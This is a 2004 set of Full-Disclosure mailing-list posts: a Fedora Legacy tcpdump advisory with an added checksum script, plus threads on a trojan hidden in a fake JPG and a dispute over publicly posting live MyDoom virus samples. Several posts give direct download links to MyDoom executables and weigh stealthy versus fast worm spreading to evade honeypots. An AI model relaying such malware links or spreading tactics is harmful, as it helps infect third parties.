http://download.fedoralegacy.org/redhat/7.3/updates/i386/libpcap-0.6.2-17.7.3.4.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/7.3/updates/i386/arpwatch-2.1a11-17.7.3.4.legacy.i386.rpm

Red Hat Linux 8.0:

SRPMS:
http://download.fedoralegacy.org/redhat/8.0/updates/SRPMS/tcpdump-3.6.3-17.8.0.5.legacy.src.rpm

i386:
http://download.fedoralegacy.org/redhat/8.0/updates/i386/tcpdump-3.6.3-17.8.0.5.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/8.0/updates/i386/libpcap-0.6.2-17.8.0.5.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/8.0/updates/i386/arpwatch-2.1a11-17.8.0.5.legacy.i386.rpm

7. Verification:

SHA1 sum                                  Package Name
---
a10c0d99cd919f459a25fdb5562d6907667b33d3  7.2/updates-testing/SRPMS/tcpdump-3.6.3-17.7.2.4.l
[Full-Disclosure] [FLSA-2004:1222] Updated tcpdump resolves security vulnerabilities (resend with correct paths)
---
Fedora Legacy Update Advisory

Synopsis: Updated tcpdump resolves security vulnerability
Advisory ID: FLSA:1222
Issue date: 2004-01-31
Product: Red Hat Linux
Keywords: Security
Cross references: https://bugzilla.fedora.us/show_bug.cgi?id=1222
CVE Names: CAN-2003-0989, CAN-2004-0055, CAN-2004-0057
---

1. Topic:

Updated tcpdump packages are now available that fix multiple security vulnerabilities which may allow remote attackers to exploit these issues by sending carefully-crafted packets to a victim. If the victim uses tcpdump, these packets could result in a denial of service, or possibly execute arbitrary code as the 'pcap' user.

2. Relevant releases/architectures:

Red Hat Linux 7.2 - i386
Red Hat Linux 7.3 - i386
Red Hat Linux 8.0 - i386

3. Problem description:

Tcpdump is a command-line tool for monitoring network traffic. Tcpdump can capture and display the packet headers on a particular network interface or on all interfaces. Tcpdump can display all of the packet headers, or just the ones that match particular criteria.

George Bakos discovered flaws in the ISAKMP decoding routines of tcpdump versions prior to 3.8.1. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CAN-2003-0989 to this issue.

Jonathan Heusser discovered an additional flaw in the ISAKMP decoding routines for tcpdump 3.8.1 and earlier. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CAN-2004-0057 to this issue.

Jonathan Heusser discovered a flaw in the print_attr_string function in the RADIUS decoding routines for tcpdump 3.8.1 and earlier. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CAN-2004-0055 to this issue.

Users of tcpdump should update to these update packages, which contain a backported security patch that corrects this issue.

Fedora Legacy would like to thank George Bakos and Jonathan Heusser for discovering and disclosing these issues, as well as Christian Pearce for providing a backported fix for Red Hat Linux 7.2, 7.3, and 8.0.

4. Solution:

Before applying this update, make sure all previously released errata relevant to your system have been applied.

To update all RPMs for your particular architecture, run:

rpm -Fvh [filenames]

where [filenames] is a list of the RPMs you wish to upgrade. Only those RPMs which are currently installed will be updated. Those RPMs which are not installed but included in the list will not be updated. Note that you can also use wildcards (*.rpm) if your current directory *only* contains the desired RPMs.

Please note that this update is also available via yum and apt. Many people find this an easier way to apply updates. To use yum issue:

yum update

or to use apt:

apt-get update; apt-get upgrade

This will start an interactive process that will result in the appropriate RPMs being upgraded on your system. This assumes that you have yum or apt-get configured for obtaining Fedora Legacy content. Please visit http://www.fedoralegacy.org/download for directions on how to configure yum and apt-get.

5. Bug IDs fixed:

http://bugzilla.fedora.us - 1222 - tcpdump security fix in rh7x, rh80

6. RPMs required:

Red Hat Linux 7.2:

SRPMS:
http://download.fedoralegacy.org/redhat/7.2/updates/SRPMS/tcpdump-3.6.3-17.7.2.4.legacy.src.rpm

i386:
http://download.fedoralegacy.org/redhat/7.2/updates/i386/tcpdump-3.6.3-17.7.2.4.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/7.2/updates/i386/libpcap-0.6.2-17.7.2.4.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/7.2/updates/i386/arpwatch-2.1a11-17.7.2.4.legacy.i386.rpm

Red Hat Linux 7.3:

SRPMS:
http://download.fedoralegacy.org/redhat/7.3/updates/SRPMS/tcpdump-3.6.3-17.7.3.4.legacy.src.rpm

i386:
http://download.fedoralegacy.org/redhat/7.3/updates/i386/tcpdump-3.6.3-17.7.3.4.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/7.3/updates/i386/libpcap-0.6.2-17.7.3.4.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/7.3/updates/i386/arpwatch-2.1a11-17.7.3.4.legacy.i386.rpm

Red Hat Linux 8.0:

SRPMS:
http://download.fedoralegacy.org/redhat/8.0/updates/SRPMS/tcpdump-3.6.3-17.8.0.5.legacy.src.rpm

i386:
http://download.fedoralegacy.org/redhat/8.0/updates/i386/tcpdump-3.6.3-17.8.0.5.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/8.0/updates/i386/libpcap-0.6.2-17.8.0.5.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/8.0/updates/i386/arpwatch-2.1a11-17.8.0.5.legacy.i386.rpm

7. Verification:

SHA1 sum                                  Package Name
---
a10c0d99cd919f459a25fdb5562d6907667b33d3  7.2/updates/SRPMS/tcpdump-3.6.3-17.7.2.4.legacy.src
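Section 7 of the advisory (in both the original post and this resend) pairs each package path with a SHA1 sum so that downloads can be checked before section 4's rpm -Fvh is run. As an added example that is not part of the Fedora Legacy advisory, the POSIX shell function below reads a list in that "SHA1SUM  path" layout and verifies every listed file; the function names (sha1_of, verify_sums, build_sample_dir) are assumptions, and the sample files and sums are constructed inline so it runs offline.

```shell
#!/bin/sh
# Added example, not Fedora Legacy tooling: verify downloaded RPMs against an
# advisory-style "SHA1SUM  path" list before handing them to rpm -Fvh.

# Pick a SHA1 tool present on this box (coreutils sha1sum, else openssl).
sha1_of() {
    if command -v sha1sum >/dev/null 2>&1; then
        sha1sum "$1" | cut -d' ' -f1
    else
        openssl dgst -sha1 "$1" | sed 's/.*= //'
    fi
}

# verify_sums SUMFILE DIR
# Each data line of SUMFILE is "<40 hex chars>  <path relative to DIR>",
# exactly the shape of the advisory's section 7 table. Header rows, blank
# lines and comments are skipped. Returns 0 only if every listed file exists
# under DIR and its SHA1 matches; a missing or tampered file returns 1.
verify_sums() {
    sumfile=$1
    dir=$2
    bad=0
    while read -r expected relpath; do
        case "$expected" in
            ''|'#'*) continue ;;
        esac
        # The "SHA1 sum  Package Name" header and "---" rule are not hex.
        printf '%s' "$expected" | grep -Eq '^[0-9a-f]{40}$' || continue
        file="$dir/$relpath"
        if [ ! -f "$file" ]; then
            echo "MISSING  $relpath" >&2
            bad=1
            continue
        fi
        actual=$(sha1_of "$file")
        if [ "$actual" = "$expected" ]; then
            echo "OK       $relpath"
        else
            echo "MISMATCH $relpath (got $actual)" >&2
            bad=1
        fi
    done < "$sumfile"
    return $bad
}

# build_sample_dir DIR: constructed stand-in "packages" (plain text files with
# the advisory's 7.2 package names) plus a SUMS list in the section 7 layout,
# so the check can be exercised without downloading anything.
build_sample_dir() {
    dir=$1
    mkdir -p "$dir/7.2/updates/i386" "$dir/7.2/updates/SRPMS"
    printf 'constructed stand-in for a source rpm\n' \
        > "$dir/7.2/updates/SRPMS/tcpdump-3.6.3-17.7.2.4.legacy.src.rpm"
    printf 'constructed stand-in for a binary rpm\n' \
        > "$dir/7.2/updates/i386/tcpdump-3.6.3-17.7.2.4.legacy.i386.rpm"
    {
        echo "SHA1 sum                                  Package Name"
        echo "---"
        for f in 7.2/updates/SRPMS/tcpdump-3.6.3-17.7.2.4.legacy.src.rpm \
                 7.2/updates/i386/tcpdump-3.6.3-17.7.2.4.legacy.i386.rpm; do
            echo "$(sha1_of "$dir/$f")  $f"
        done
    } > "$dir/SUMS"
}

# Intended use, mirroring section 4: freshen (-F) only after every file
# verified, so a corrupted or substituted download never reaches rpm.
#   verify_sums SUMS . && rpm -Fvh 7.2/updates/i386/*.rpm
```

On a real system the SUMS file is the signed advisory text itself, not a list generated beside the downloads as build_sample_dir does for the demonstration.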
Re: [Full-Disclosure] another Trojan with the ADO hole? + a twist in the story
--On Saturday, January 31, 2004 7:35 PM +0200 Gadi Evron <[EMAIL PROTECTED]> wrote:

> The past Trojan horses which spread this way took advantage of the fact web servers send an HTML 404 message if a file doesn't exist.
>
> The original sample - britney.jpg - was simply an html file itself, and using that fact, and IE loading it. It was combined with one of the latest exploits of the time (I don't think MS patched it yet), and downloaded the Trojan horses.
>
> This time around there is actually a picture on the web page, of a real honest to God girl. But in another frame.. the same story all over again.
>
> For blocking purposes, the (un-safe) URL is: http://ut.uk.to/cs.jpg .

Didn't work on my Titanium using Safari. The girl was...uh...well-endowed. :-)

Paul Schmehl ([EMAIL PROTECTED])
Adjunct Information Security Officer
The University of Texas at Dallas
AVIEN Founding Member
http://www.utdallas.edu
RE: [Full-Disclosure] MyDoom download info
> -----Original Message-----
> From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Steve Wray
> Sent: Sunday, 1 February 2004 10:46 a.m.
> To: 'Paul Schmehl'; [EMAIL PROTECTED]
> Subject: RE: [Full-Disclosure] MyDoom download info
>
> If a virus could spread slowly but stealthily, it could be all over the planet and activated before any antivirus vendor became aware of its presence and came out with a fix; it wouldn't matter much if it took a year of quiet spreading.

Nah, that would work if there were no honeypots. I'm sure that 99% of AV companies, as well as numerous other security companies/individuals, run honeypots and they would catch this pretty quickly as your worm can't know what's a honeypot and what isn't (I'm not going into honeypot detection techniques now).

Therefore, the only way for a worm to be successful is to spread as fast as it can, which in turn results in disruptions of service for the host machine and easier detection.

Cheers,

Bojan
Re: [Full-Disclosure] MyDoom download info
On Sun, 01 Feb 2004 10:46:09 +1300, Steve Wray <[EMAIL PROTECTED]> said:

> but to address the points, as one person wrote, it's difficult to spread fast when you are trying to be stealthy; I would argue that if one is stealthy enough, one doesn't need to spread fast since one is trying to evade detection rather than evading elimination.

Very true...

> If a virus could spread slowly but stealthily, it could be all over the planet and activated before any antivirus vendor became aware of its presence and came out with a fix; it wouldn't matter much if it took a year of quiet spreading.

On the other hand, it severely limits your growth potential. If you go for a spread-fast strategy, you *will* set off all the white hats' detectors (on sheer unexpected traffic volume, if nothing else). You then have 100 white hats all starting from ground zero in analyzing the critter, and you're basically limited to however many systems you can nail in 8 hours before they get a signature out the door. But since you're spreading fast, that's still a lot of systems.

What I probably didn't make clear enough the first time I said it was that if you're propagating slowly, you need to be *very* careful - all it takes is for you to hit *one* wrong IDS or honeypot and you've been spotted. And more importantly for the discussion, even if it takes that researcher a week of evening and lunch hours to figure out what you're up to, you won't have gotten many more systems during that week. Consider that a fast-spreading worm can nail several million boxes, while the average IRC botnet built more stealthily is in the several 10K range.

> Sometimes (and here I go sounding paranoid again) it seems that the viruses and worms we see are nothing but a smokescreen; they are SO VERY obvious.

Welcome to the club. Want some tinfoil? :)
Re: [Full-Disclosure] MyDoom download info
Roland Dobbins <[EMAIL PROTECTED]> wrote:

> I know Dan Spisak personally, and can vouch for his honesty and integrity.

And _you_ are???

It seems you largely missed the point.

...

Anyway, it is interesting to know that Cisco employs people who think there is integrity in both publicly distributing viruses, and doing so after repackaging them with a "dropper" that makes them not immediately detectible.

--
Nick FitzGerald
Computer Virus Consulting Ltd.
Ph/FAX: +64 3 3529854
Re: [Full-Disclosure] MyDoom download info
Hello Steve,

* Steve Wray <[EMAIL PROTECTED]> [2004-01-31 23:00]:
> > You can always disassemble the virus, which is what people will do if it's a real "popular" one such as MyDoom.
>
> IIRC there are viruses that are encrypted and are almost impossible to disassemble?
>
> Would that be true?

I think not forever. There is a good Phrack article about binary encryption.

nico
--
Nico Golde
nico ngolde de
public key available on: http://www.ngolde.de/gpg.html
Re[2]: [Full-Disclosure] MyDoom download info
NF> that x employs people who think
NF> there is integrity in both publicly
NF> distributing viruses

I read F u l l - D i s c l o s u r e, not restricted Disclosure.

I applaud the person who posted the B variant, for me the only chance to "analyse" that one.

NF> after repackaging them with a "dropper" that makes them not immediately
NF> detectible.

Let's call this "NAME of File" detection, shall we? It goes like this:

MyDoomA.exe = MyDoomA virus - MyDoomB.exe = MyDoomB virus

Quit the whining and post something productive.
RE: [Full-Disclosure] MyDoom.b samples taken down
Hi Daniel,

That's unbelievable and incredibly lame of McAfee!! Are we supposed to sit and wait for our free copies to be delivered to us by the very people we are trying to stop from getting infected???

I have copied the files to the following locations:

http://homepages.ihug.co.nz/~mjcarter/virus/MyDoomA.exe
http://homepages.ihug.co.nz/~mjcarter/virus/MyDoomB.exe

Mike

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Behalf Of Daniel Spisak
Sent: Sunday, February 01, 2004 10:38 AM
To: [Full Disclosure]
Subject: [Full-Disclosure] MyDoom.b samples taken down

I have been asked by McAfee to take down my copy of MyDoom.B as they have insinuated that I am now responsible for this virus spreading. Sorry guys, I tried to help people out here but it would seem greater powers are at work here. Don't email me asking for copies as I won't be giving any more out. I suggest you direct future requests for this virus towards McAfee, perhaps in their infinite wisdom they will be willing to help other researchers.

Daniel E. Spisak
Security Engineer
OnlineSecurity
www.onlinesecurity.com
[EMAIL PROTECTED]
Cell: 562.331.1603
RE: [Full-Disclosure] MyDoom.b samples taken down
On Sun, 2004-02-01 at 06:08, Mike wrote:
> I have copied the files to the following locations:
> http://homepages.ihug.co.nz/~mjcarter/virus/MyDoomA.exe
> http://homepages.ihug.co.nz/~mjcarter/virus/MyDoomB.exe

And so the virus spreads again, and by means not anticipated by its author... Spreading via search engines, and infecting people wanting to download the Doom sequel...

When posting viruses, may I suggest a mechanism that forces someone to manually click on a button or enter a number or something? Anything that prevents automatic download from a URL. Otherwise your web space might be misused by MyDoomC as a download point.

Regards,
Frank
Re: [Full-Disclosure] Re: Script Kiddies
On Sat, 31 Jan 2004 09:35:13 PST, [EMAIL PROTECTED] said:

> The only difference between a 'script kiddie' and 90% of the 'security experts' out there are the tools they use.

Damn, I've been outed. The average script kiddie probably has more exploits on their hard drive than I do, I must be a Ted Sturgeon expert
Re[2]: [Full-Disclosure] MyDoom download info
On Sun, 1 Feb 2004, Thierry wrote:

> NF> that x employs people who think
> NF> there is integrity in both publicly
> NF> distributing viruses
>
> I read F u l l - D i s c l o s u r e
> not restricted Disclosure.

Exactly.

> Quit the whining and post something productive.

Hear, hear!

--
Yours,
J.A. Terranson
[EMAIL PROTECTED]

"Unbridled nationalism, as distinguished from a sane and legitimate patriotism, must give way to a wider loyalty, to the love of humanity as a whole. Bahá'u'lláh's statement is: "The earth is but one country, and mankind its citizens."

The Promise of World Peace
http://www.us.bahai.org/interactive/pdaFiles/pwp.htm
[Full-Disclosure] MyDoom.B
Look, apparently this is not the list for me to be on. All I was trying to do at first was find B to analyze. Then I tried to provide it to people via email but that quickly escalated past what I could personally handle by myself. Then I gave the URL to the list and now we have this fine mess. McAfee was just trying to give me a friendly nudge that what I did was probably not the best method of distribution. So try to not harbor any ill will towards them, they were just trying to do their job. I overreacted and it would seem this situation would dearly like to spiral out of control. I never wished to drag people I know needlessly into a pissing match. Nor did I ever wish to intend to make this variant more active in the wild.

If you are mirroring the files I had previously hosted please take them down from your sites and distribute them via email only if at all possible. Posting the virus to a URL on this list means it ends up on the web archive which means it shows up in Google which means any Tom, Dick, or Jane can download the live virus. So if you wish to help others email is the way I suggest.

Anyways, I'm going to shut the hell up now for a while and hope that what sanity is left can prevail here.

Daniel E. Spisak
Security Engineer
OnlineSecurity
www.onlinesecurity.com
[EMAIL PROTECTED]
Cell: 562.331.1603
Re: [Full-Disclosure] MyDoom.B
On Saturday 31 January 2004 16:37, Daniel Spisak wrote:
> Look, apparently this is not the list for me to be on. All I was trying to do at first was find B to analyze. Then I tried to provide it to people via email but that quickly escalated past what I could personally handle by myself. Then I gave the URL to the list and now we have this fine mess. McAfee was just trying to give me a friendly nudge that what I did was probably not the best method of distribution. So try to not harbor any ill will towards them, they were just trying to do their job. I overreacted and it would seem this situation would dearly like to spiral out of control. I never wished to drag people I know needlessly into a pissing match. Nor did I ever wish to intend to make this variant more active in the wild.

You want a job with NA someday? Not that there's anything /wrong/ with that!

base-64 'em, and post with an adequate warning - to this list. They'll be web-archived within minutes anyway.
Re: [Full-Disclosure] MyDoom.b samples taken down
Mike wrote:
> That's unbelievable and incredibly lame of McAfee!! Are we supposed to sit and wait for our free copies to be delivered to us by the very people we are trying to stop from getting infected???

Daniel and Mike, thanks for making those files available for those of us who wish to research this virus firsthand, instead of relying on (sometimes) wildly inaccurate media and "expert" reporting.

Shame on McAfee for succeeding in intimidating a fellow researcher - I guess that's what happens when viruses become Big Business; use whatever FUD is available to limit your competition, increase market share and maximize shareholder value. Foo.
Re: [Full-Disclosure] MyDoom.b samples taken down
Kurt Weiske <[EMAIL PROTECTED]> wrote:

> Daniel and Mike, thanks for making those files available for those of us who wish to research this virus firsthand, instead of relying on (sometimes) wildly inaccurate media and "expert" reporting.
>
> Shame on McAfee for succeeding in intimidating a fellow researcher - I

It seems that "intimidation" may have been too strong a word -- see Daniel's latest post -- but whatever...

> guess that's what happens when viruses become Big Business; use whatever FUD is available to limit your competition, increase market share and maximize shareholder value. Foo.

No -- that's what happens when you actually have half a clue about the huge _further_ damage such things can do if actually successfully distributed. Mydoom.B has largely _not_ taken off, but all it probably needs is a touch of the usual "luck" which is all that distinguishes most successful mass-mailers from the huge numbers of unsuccessful ones lamers, like those on this list clamouring to get a Mydoom.B sample, never see.

I know most of you will not believe this because you are so stupid you already believe that live virus samples are _just_ information and therefore _should_ be subject to "full disclosure" (this is a special form of ignorance that very little empirical evidence seems able to budge -- at least until a holder of the ignorance is the person bitten by it), _but_ each extra copy of Mydoom.B downloaded from the various URLs published on this list increases the likelihood that the virus writer will have his "glory" with the Mydoom.B variant as well. The cost of that far outweighs the value of the jollies a few of you will get from working out how to unpack the "hacked" UPX compression used, poking a few clever comments into your disasm, or mastering ROT13 to "decrypt" the virus' internal strings.

In the process, some of you will run it in a VM connected via virtual network to the real Internet (because you are so stupid you believe that "because you run Linux you are safe" or you forgot you enabled bridged networking for some "special reason" and never got round to disabling it) and more copies of it will "escape" (we see this often). And you want to subject the world to that threat because you want to spend hours and hours doing what has been done "well enough" in multiple professional security company labs for them to ship detection and repair utilities within minutes to an hour or two of first receiving a sample of it several days ago. Get real...

Try handling dozens of these a day and then see what you feel about the quality of the work of those labs and that 'wildly inaccurate [...] "expert" reporting'

And save me the almost inevitable full-disclosure mantra BS replies! I really do not want to hear your ignorance rephrased that way, again -- at least walk the walk before you try to talk the talk...

--
Nick FitzGerald
Computer Virus Consulting Ltd.
Ph/FAX: +64 3 3529854
[Fwd: Re: [Full-Disclosure] another Trojan with the ADO hole? + a twist in the story]
Ergh - the http://207.46.110.24/gateway/gateway.dll? address is only a MSN MSGR site - sorry.

Dan

-----Forwarded Message-----
From: Paul Schmehl <[EMAIL PROTECTED]>
To: Gadi Evron <[EMAIL PROTECTED]>, [EMAIL PROTECTED], [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] another Trojan with the ADO hole? + a twist in the story
Date: 31 Jan 2004 14:24:21 -0600

--On Saturday, January 31, 2004 7:35 PM +0200 Gadi Evron <[EMAIL PROTECTED]> wrote:

> The past Trojan horses which spread this way took advantage of the fact web servers send an HTML 404 message if a file doesn't exist.
>
> The original sample - britney.jpg - was simply an html file itself, and using that fact, and IE loading it. It was combined with one of the latest exploits of the time (I don't think MS patched it yet), and downloaded the Trojan horses.
>
> This time around there is actually a picture on the web page, of a real honest to God girl. But in another frame.. the same story all over again.
>
> For blocking purposes, the (un-safe) URL is: http://ut.uk.to/cs.jpg .

Didn't work on my Titanium using Safari. The girl was...uh...well-endowed. :-)

Paul Schmehl ([EMAIL PROTECTED])
Adjunct Information Security Officer
The University of Texas at Dallas
AVIEN Founding Member
http://www.utdallas.edu
[Fwd: Re: [Full-Disclosure] another Trojan with the ADO hole? + a twist in the story]
Doesn't work in Mozilla v1.3.1 on Xandros v1.1 either, though the message was "(111) Connection refused" by http://mitglied.lycos.de/mycutewebspace, maybe they don't like Mozilla? :-)

Our proxy shows the following path when you click the link:

http://freedns.afraid.org/blank.html
http://mitglied.lycos.de/mycutewebspace
http://207.46.110.24/gateway/gateway.dll?

Cheers,
Dan

-----Forwarded Message-----
From: Paul Schmehl <[EMAIL PROTECTED]>
To: Gadi Evron <[EMAIL PROTECTED]>, [EMAIL PROTECTED], [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] another Trojan with the ADO hole? + a twist in the story
Date: 31 Jan 2004 14:24:21 -0600

--On Saturday, January 31, 2004 7:35 PM +0200 Gadi Evron <[EMAIL PROTECTED]> wrote:

> The past Trojan horses which spread this way took advantage of the fact web servers send an HTML 404 message if a file doesn't exist.
>
> The original sample - britney.jpg - was simply an html file itself, and using that fact, and IE loading it. It was combined with one of the latest exploits of the time (I don't think MS patched it yet), and downloaded the Trojan horses.
>
> This time around there is actually a picture on the web page, of a real honest to God girl. But in another frame.. the same story all over again.
>
> For blocking purposes, the (un-safe) URL is: http://ut.uk.to/cs.jpg .

Didn't work on my Titanium using Safari. The girl was...uh...well-endowed. :-)

Paul Schmehl ([EMAIL PROTECTED])
Adjunct Information Security Officer
The University of Texas at Dallas
AVIEN Founding Member
http://www.utdallas.edu
Re: [Full-Disclosure] MyDoom download info
Please allow me to clarify - I merely intended to indicate that I know Dan to be a man of personal and professional integrity, no endorsement of the practice was intended, sorry for any confusion.

On Jan 31, 2004, at 2:54 PM, Nick FitzGerald wrote:

> Roland Dobbins <[EMAIL PROTECTED]> wrote:
>
> > I know Dan Spisak personally, and can vouch for his honesty and integrity.
>
> And _you_ are???
>
> It seems you largely missed the point.
>
> ...
>
> Anyway, it is interesting to know that Cisco employs people who think there is integrity in both publicly distributing viruses, and doing so after repackaging them with a "dropper" that makes them not immediately detectible.
>
> --
> Nick FitzGerald
> Computer Virus Consulting Ltd.
> Ph/FAX: +64 3 3529854

-
Roland Dobbins <[EMAIL PROTECTED]> // 408.527.6376 voice
Re: [Full-Disclosure] MyDoom.b samples taken down
Nick FitzGerald wrote:
> I know most of you will not believe this because you are so stupid you already believe that live virus samples are _just_ information and therefore _should_ be subject to "full disclosure" (this is a special form of ignorance that very little empirical evidence seems able to budge

Before I make a judgement here, are you against publishing the virus in executable form that could be accidentally launched, or against publishing the virus in any form?

If the latter, then perhaps you might find other mailing lists with a more sympathetic audience.

If the former, after consideration, I agree. Handling a live virus is akin to handling their real-world counterparts, and having some protection against accidentally launching it on a production system is a Good Thing. I've renamed mine to a non-executable extension, and they're off my production boxes.
Re: [Full-Disclosure] MyDoom.b samples taken down
On Sun, 1 Feb 2004, Nick FitzGerald wrote:

> of it will "escape" (we see this often). And you want to subject the world to that threat because you want to spend hours and hours doing what has been done "well enough" in multiple professional security company labs for them to ship detection and repair utilities within minutes to an hour or two of first receiving a sample of it several days ago. Get real...

This is just so arrogant as to be unreal. And how do you suppose those "experts" got to be that way? You wouldn't happen to work in the field, would you, Nick?
Re: [Full-Disclosure] MyDoom.b samples taken down
Nick FitzGerald wrote:
> And save me the almost inevitable full-disclosure mantra BS replies!

heh.
Re: [Full-Disclosure] MyDoom.b samples moved
> > Nick FitzGerald wrote:
> > > And save me the almost inevitable full-disclosure mantra BS replies!
>
> heh.

Due to "popular demand" I've moved the files.

http://homepages.ihug.co.nz/~mjcarter/

You'll have to scroll to the bottom of the page and click on a link.

Mike